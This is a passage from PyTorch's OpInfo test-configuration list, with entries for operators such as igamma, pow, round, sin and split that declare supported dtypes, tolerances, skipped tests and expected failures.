position 0, but got: Tensor DecorateInfo( unittest.skip("Skipped!"), "TestNNCOpInfo", "test_nnc_correctness", ), DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-3, rtol=1e-3)}), "TestJit", "test_variant_consistency_jit", ), ), skips=( # RuntimeError: expected int at position 0, but got: Tensor DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", ), ), ), # We have to add 2 OpInfo entries for `igamma` and `igammac`. The first is the # standard entry, the second is to run gradcheck tests on the second argument. BinaryUfuncInfo('igamma', dtypes=floating_types_and(torch.bfloat16, torch.float16), aliases=('torch.special.gammainc',), dtypesIfCUDA=floating_types(), # TODO: FIXME supports_rhs_python_scalar=False, supports_autograd=False, skips=( # FIXME: incorrectly tries to pass a rhs scalar DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), )), # TODO: FIXME, ideally by implementing grad for both inputs # BinaryUfuncInfo('igamma', # variant_test_name='grad_other', # # Since autograd formula is implemented only for other and # # gradcheck test verifies the formula for input in SampleInput, # # we permute the arguments. # op=lambda self, other, **kwargs: torch.igamma(other, self, **kwargs), # inplace_variant=None, # method_variant=None, # supports_rhs_python_scalar=False, # rhs_make_tensor_kwargs=dict(requires_grad=False), # dtypes=floating_types_and(torch.bfloat16, torch.float16), # backward_dtypesIfCPU=floating_types_and(torch.bfloat16), # dtypesIfCUDA=floating_types(), # backward_dtypesIfCUDA=floating_types(), # supports_inplace_autograd=False, # skips=( # # Derivative wrt first tensor not implemented # DecorateInfo(unittest.expectedFailure, "TestCommon", # "test_floating_inputs_are_differentiable"), # # test does not work with passing lambda for op # # AssertionError: False is not true : Tensors failed to compare as equal! # DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # # test fails as we permute the arguments for the function variant # # but not for inplace or method.
# DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # # TypeError: igamma(): argument 'input' (position 1) must be Tensor, not float # DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs'), # )), BinaryUfuncInfo('igammac', dtypes=floating_types_and(torch.bfloat16, torch.float16), aliases=('torch.special.gammaincc',), dtypesIfCUDA=floating_types(), supports_autograd=False, supports_rhs_python_scalar=False, skips=( # FIXME: incorrectly tries to pass a rhs scalar DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), )), # TODO: FIXME, ideally by implementing grad for both inputs # BinaryUfuncInfo('igammac', # variant_test_name='grad_other', # # Since autograd formula is implemented only for other and # # gradcheck test verifies the formula for input in SampleInput, # # we permute the arguments # op=lambda self, other, **kwargs: torch.igammac(other, self, **kwargs), # inplace_variant=None, # method_variant=None, # supports_rhs_python_scalar=False, # rhs_make_tensor_kwargs=dict(requires_grad=False), # dtypes=floating_types_and(torch.bfloat16, torch.float16), # backward_dtypesIfCPU=floating_types_and(torch.bfloat16), # dtypesIfCUDA=floating_types(), # backward_dtypesIfCUDA=floating_types(), # supports_inplace_autograd=False, # decorators=[ # # Derivative wrt first tensor not implemented # DecorateInfo(unittest.expectedFailure, "TestCommon", # "test_floating_inputs_are_differentiable"), # ], # skips=( # # test does not work with passing lambda for op # # AssertionError: False is not true : Tensors failed to compare as equal! # DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # # test fails as we permute the arguments for the function variant # # but not for inplace or method.
# DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # # TypeError: igammac(): argument 'input' (position 1) must be Tensor, not float # DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs'), # )), OpInfo('nn.functional.softshrink', aten_name="softshrink", aten_backward_name='softshrink_backward', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, ), OpInfo('nn.functional.hardshrink', aten_name="hardshrink", aten_backward_name='hardshrink_backward', dtypes=floating_types_and(torch.bfloat16,), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::hardshrink"]), OpInfo('nn.functional.hardtanh', aten_name="hardtanh", aten_backward_name='hardtanh_backward', dtypes=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64, torch.bfloat16), backward_dtypes=all_types(), dtypesIfCUDA=floating_types_and(torch.int8, torch.int16, torch.int32, torch.int64, torch.float16, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.float16), supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::hardtanh"], ), OpInfo('nn.functional.gelu', aten_name="gelu", aten_backward_name='gelu_backward', ref=reference_gelu if TEST_SCIPY else _NOTHING, supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_gelu, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_gradgrad=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::gelu"], skips=( # AssertionError: Tensor-likes are not close! 
# May not replicate in CI DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'),)), OpInfo('nn.functional.relu6', aten_name="relu6", dtypes=all_types_and(torch.bfloat16), backward_dtypes=floating_types(), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.float16), supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_softshrink_hardshrink_hardtanh, supports_gradgrad=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::relu6"]), OpInfo('mm', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_mm), OpInfo('mode', op=torch.mode, dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Resized a non-empty tensor but did not warn about it DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), ), sample_inputs_func=sample_inputs_mode,), MvlGammaInfo(variant_test_name='mvlgamma_p_1', domain=(1, None), skips=skips_mvlgamma() + \ (DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.float16, torch.int8)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int8,)),), sample_kwargs=lambda device, dtype, input: ({'p': 1}, {'d': 1})), MvlGammaInfo(variant_test_name='mvlgamma_p_3', domain=(2, None), skips=skips_mvlgamma(skip_redundant=True) + ( DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.float16, torch.int8)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int8,)), ), sample_kwargs=lambda device, dtype, input: ({'p': 3}, {'d': 3})), MvlGammaInfo(variant_test_name='mvlgamma_p_5', domain=(3, None), skips=skips_mvlgamma(skip_redundant=True) + ( DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.float16, torch.int8)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=(torch.int8,)), ), sample_kwargs=lambda device, dtype, input: ({'p': 5}, {'d': 5})), BinaryUfuncInfo('ne', ref=np.not_equal, aliases=('not_equal',), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False), OpInfo('narrow', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_narrow), UnaryUfuncInfo('neg', aliases=('negative', ), ref=np.negative, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), error_inputs_func=error_inputs_neg, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True, skips=( # RuntimeError: "nonzero_count_cpu" not implemented for 
'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,),), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,),), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,),), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,),) )), OpInfo('dist', op=torch.dist, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), supports_out=False, supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_dist), OpInfo('outer', op=torch.outer, aliases=('ger', ), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_outer,), OpInfo('ormqr', op=torch.ormqr, dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_ormqr, error_inputs_func=error_inputs_ormqr, decorators=[skipCUDAIfNoCusolver, skipCPUIfNoLapack], skips=( # ormqr does not support forward when complex inputs require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), )), OpInfo('permute', ref=np.transpose, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, assert_autodiffed=True, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_permute, reference_inputs_func=reference_inputs_permute), BinaryUfuncInfo('pow', dtypes=all_types_and_complex_and(torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), ref=np.power, # Due to AVX2 currently not being fully supported for Float16, log_vml_cpu can't be enabled # for Float16, causing this test to fail. pow's autograd for Float16 is thus currently # unsupported on CPU.
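# A minimal illustrative sketch (not from this file) of why the make_tensor kwargs below
# clamp both operands to be non-negative; the exact error text is an assumption about
# current builds:
# >>> torch.tensor(2).pow(-1)      # integers to negative integer powers raise a RuntimeError
# >>> torch.tensor(-2.0).pow(0.5)  # negative reals to fractional powers produce tensor(nan)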
backward_dtypes=floating_and_complex_types_and(torch.bfloat16), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.bfloat16, torch.half, torch.chalf), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, supports_one_python_scalar=True, # Integer types do not support negative exponents rhs_make_tensor_kwargs=dict(low=0), # Raising negative real numbers to fractional powers is not supported lhs_make_tensor_kwargs=dict(low=0), decorators=( DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-4, rtol=1.3e-05)}), 'TestBinaryUfuncs', 'test_reference_numerics'), DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-4, rtol=1.3e-05), torch.complex128: tol(atol=1e-4, rtol=1.3e-05)}), 'TestBinaryUfuncs', 'test_scalar_support'), ), skips=( # Skipping integers because they are being raised to negative powers, causing an error DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=[torch.int8, torch.int16, torch.int32, torch.int64]), DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_reference_numerics_large_values', dtypes=[torch.int16, torch.int32, torch.int64]), # FIXME Complex values error with: Greatest absolute difference: nan at index # Ref: https://github.com/pytorch/pytorch/issues/76853 # For `chalf`, reference computation in `numpy` is computed in `cfloat`. # Output of `chalf` saturates to `inf` quicker than reference due to its small range # which leads to failure of this test. DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.complex32,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.complex32, torch.complex64, torch.complex128)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_large_values', dtypes=(torch.complex32, torch.complex64, torch.complex128)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values', dtypes=(torch.complex32, torch.complex64, torch.complex128)), )), BinaryUfuncInfo('float_power', ref=np.float_power, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.bool), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_one_python_scalar=True, # Integer types do not support negative exponents rhs_make_tensor_kwargs=dict(low=0), # Raising negative real numbers to fractional powers is not supported lhs_make_tensor_kwargs=dict(low=0), decorators=( DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-4, rtol=1.3e-05), torch.complex128: tol(atol=1e-4, rtol=1.3e-05)}), 'TestBinaryUfuncs', 'test_scalar_support'), ), skips=( # FIXME # AssertionError: Object comparison failed: torch.float64 != torch.float32 DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), # -3.43399e+38 is outside the range of representable values of type 'float' DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Complex values error with: Greatest absolute difference: nan at index DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=[torch.complex64, torch.complex128]), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_large_values', dtypes=[torch.complex64, torch.complex128]), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs',
'test_reference_numerics_extremal_values', dtypes=[torch.complex64, torch.complex128]), )), OpInfo('qr', op=torch.qr, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_qr_geqrf, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # In-place ops check_batched_gradgrad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), UnaryUfuncInfo('rad2deg', ref=np.degrees, decorators=(precisionOverride({torch.bfloat16: 7e-1, torch.float16: 7e-1}),), dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), skips=( # Reference: https://github.com/pytorch/pytorch/pull/51283#issuecomment-770614273 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16]), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('real', ref=np.real, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( # Skip since real and imag don't have out variants. DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_out_arg_all_dtypes'), )), OpInfo( "roll", ref=np.roll, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), error_inputs_func=error_inputs_roll, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_roll, decorators=(onlyNativeDeviceTypes,), ), OpInfo( "rot90", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), error_inputs_func=error_inputs_rot90, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_rot90, ), # To test reference numerics against multiple values of argument `decimals`, # we make multiple OpInfo entries with each entry corresponding to a different value of decimals.
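# A minimal illustrative sketch (not from this file) of the `decimals` argument the entries
# below exercise; printed values are approximate:
# >>> torch.round(torch.tensor(1234.5678), decimals=3)   # -> tensor(1234.5680)
# >>> torch.round(torch.tensor(1234.5678), decimals=-3)  # -> tensor(1000.)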
UnaryUfuncInfo('round', ref=np.round, aliases=('special.round',), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True,), UnaryUfuncInfo('round', ref=np.round, variant_test_name='decimals_0', aliases=('special.round',), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_kwargs=lambda device, dtype, input: ({'decimals': 0}, {'decimals': 0}), sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'decimals': 0}), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_sparse_csr=False), UnaryUfuncInfo('round', ref=np.round, variant_test_name='decimals_3', aliases=('special.round',), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_kwargs=lambda device, dtype, input: ({'decimals': 3}, {'decimals': 3}), sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'decimals': 3}), skips=( # test_ops already tested for this overload with `decimals_0` opinfo entry DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_sparse_csr=False), UnaryUfuncInfo('round', ref=np.round, variant_test_name='decimals_neg_3', aliases=('special.round',), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_kwargs=lambda device, dtype, input: ({'decimals': -3}, {'decimals': -3}), sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'decimals': -3}), skips=( # test_ops already tested for this overload with `decimals_0` opinfo entry DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=False, supports_sparse_csr=False), UnaryUfuncInfo('sin', ref=np.sin, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), # TODO: Add torch.chalf backward dtype support. Currently, we get: # AssertionError: The supported dtypes for sin on device type cuda are incorrect! # The following dtypes did not work in backward but are listed by the OpInfo: {torch.complex32}. 
backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), assert_autodiffed=True, handles_large_floats=False, supports_sparse=True, supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Fails on CUDA but passes on ROCm DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cdouble,), device_type='cuda'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.cfloat, torch.cdouble,), device_type='cpu', active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cfloat, torch.cdouble,), device_type='cpu', active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), ), decorators=(precisionOverride({torch.bfloat16: 1e-2}),)), UnaryUfuncInfo('sinc', ref=np_sinc_with_fp16_as_fp32, aliases=('special.sinc',), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), handles_large_floats=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 1e-2, torch.float16: 1e-2}),), skips=( # Reference: https://github.com/pytorch/pytorch/issues/49133 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.cfloat]), )), UnaryUfuncInfo('sinh', ref=np_unary_ufunc_integer_promotion_wrapper(np.sinh), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, decorators=(precisionOverride({torch.float16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cdouble,)), # Reference: https://github.com/pytorch/pytorch/issues/48641 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.int8]), DecorateInfo(unittest.skip("Skipped! 
sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), )), UnaryUfuncInfo('sign', ref=reference_sign, dtypes=all_types_and(torch.bool, torch.bfloat16, torch.half), dtypesIfCUDA=all_types_and(torch.bool, torch.bfloat16, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/41245 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16, torch.float16, torch.float32, torch.float64]), )), UnaryUfuncInfo('sgn', ref=reference_sgn, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), backward_dtypes=floating_and_complex_types_and(torch.bfloat16, torch.half), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.bfloat16, torch.half, torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/41245 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16, torch.float16, torch.float32, torch.float64]), # Reference: https://github.com/pytorch/pytorch/issues/53958 # Test fails in comparison on Nan as the `equal_nan` is True for # comparing the CPU tensors. DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.complex64, torch.complex128]), # Reference: https://github.com/pytorch/pytorch/issues/48486 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.complex64]), # The complex formula might be wrong DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', dtypes=complex_types()), # Passes for float, but for complex - Need: _s_where DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=complex_types()), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_inplace_forward_mode_AD', dtypes=complex_types()), DecorateInfo(unittest.skip("Skipped! 
sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # add_out_op2_sparse_csr DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), )), OpInfo('split', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool, torch.chalf), sample_inputs_func=partial(sample_inputs_split, list_args=False), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused assert_autodiffed=True), OpInfo('split', # Cannot declare this aten_name because of # test_variant_consistency_jit_split_list_args_cpu_float32 decomp_aten_name='split_with_sizes', variant_test_name='list_args', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), sample_inputs_func=partial(sample_inputs_split, list_args=True), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('split_with_sizes', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool, torch.chalf), sample_inputs_func=sample_inputs_split_with_sizes, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True), BinaryUfuncInfo('__radd__', op=torch.Tensor.__radd__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=['aten::add'],), BinaryUfuncInfo('__rdiv__', op=torch.Tensor.__rdiv__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), promotes_int_to_float=True, lhs_make_tensor_kwargs={'exclude_zero': True}, supports_out=False, skips=( # https://github.com/pytorch/pytorch/issues/76806 DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, autodiff_nonfusible_nodes=['aten::mul', 'aten::reciprocal'],), BinaryUfuncInfo('__rmul__', op=torch.Tensor.__rmul__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=['aten::mul'],), BinaryUfuncInfo('__rand__', op=torch.Tensor.__rand__, 
